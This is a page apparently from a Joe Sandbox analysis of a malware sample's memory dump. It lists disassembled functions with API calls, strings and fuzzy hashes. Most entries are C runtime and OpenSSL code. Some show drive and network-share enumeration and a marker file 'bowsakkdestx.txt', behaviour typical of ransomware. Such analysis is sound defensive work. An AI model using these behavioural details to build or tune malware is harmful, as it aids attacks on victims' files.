Uniqueness

Uniqueness Score: -1.00%

Function 004306EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON

Download Yara Rule

APIs

___unDName.LIBCMT ref: 0043071B
_strlen.LIBCMT ref: 0043072E
__lock.LIBCMT ref: 0043074A
_malloc.LIBCMT ref: 0043075C
_malloc.LIBCMT ref: 0043076D
_free.LIBCMT ref: 004307B6

Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF

_free.LIBCMT ref: 004307AF

Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
String ID:
API String ID: 3704956918-0
Opcode ID: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
Opcode Fuzzy Hash: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98

Uniqueness

Uniqueness Score: -1.00%

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
DispatchMessageW.USER32(?), ref: 00411B5C
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
Sleep.KERNEL32(00000064), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00425141

Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1

__mtinitlocks.LIBCMT ref: 00425146
__mtterm.LIBCMT ref: 0042514F

Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B

__calloc_crt.LIBCMT ref: 00425174
__initptd.LIBCMT ref: 00425196
GetCurrentThreadId.KERNEL32 ref: 0042519D

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: e4f597f782e3b4b52baab141e34533d3b2cf4c526fa64c122f399e87149032cb
Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
Opcode Fuzzy Hash: e4f597f782e3b4b52baab141e34533d3b2cf4c526fa64c122f399e87149032cb
Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C

Uniqueness

Uniqueness Score: -1.00%

Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0042594A

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

_free.LIBCMT ref: 00425970

Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

__lock.LIBCMT ref: 00425989
___removelocaleref.LIBCMT ref: 00425998
___freetlocinfo.LIBCMT ref: 004259B1
_free.LIBCMT ref: 004259C4

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 626533743-0
Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

reason(%lu), xrefs: 00450758
lib(%lu), xrefs: 0045071C
func(%lu), xrefs: 00450734
error:%08lX:%s:%s:%s, xrefs: 00450792

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D
.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__get_sys_err_msg.LIBCMT ref: 004C5DCD

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3123740607-798102604
Opcode ID: cd8e1f0d25954be7587d55b2fdc1dfd6ff928078fe4f34d2f7ed8acf51f870de
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: cd8e1f0d25954be7587d55b2fdc1dfd6ff928078fe4f34d2f7ed8acf51f870de
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Uniqueness

Uniqueness Score: -1.00%

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084
.\crypto\pem\pem_lib.c, xrefs: 00463097
phrase is too short, needs to be at least %d chars, xrefs: 00463070

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszTitle, xrefs: 0041BA9B
LPCWSTRszWindowClass, xrefs: 0041BAA0

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON

Download Yara Rule

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
String ID:
API String ID: 2168648987-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Uniqueness

Uniqueness Score: -1.00%

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 689780e34762e1bdd470f6e738b5d4a19f8307b80ee08f64488e578714c63e7f
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 689780e34762e1bdd470f6e738b5d4a19f8307b80ee08f64488e578714c63e7f
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00660000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
DispatchMessageW.USER32(?), ref: 0041F0B6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
DispatchMessageW.USER32(?), ref: 0041E546
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
DispatchMessageW.USER32(?), ref: 0041FA7B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
DispatchMessageW.USER32(?), ref: 0041FE2B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
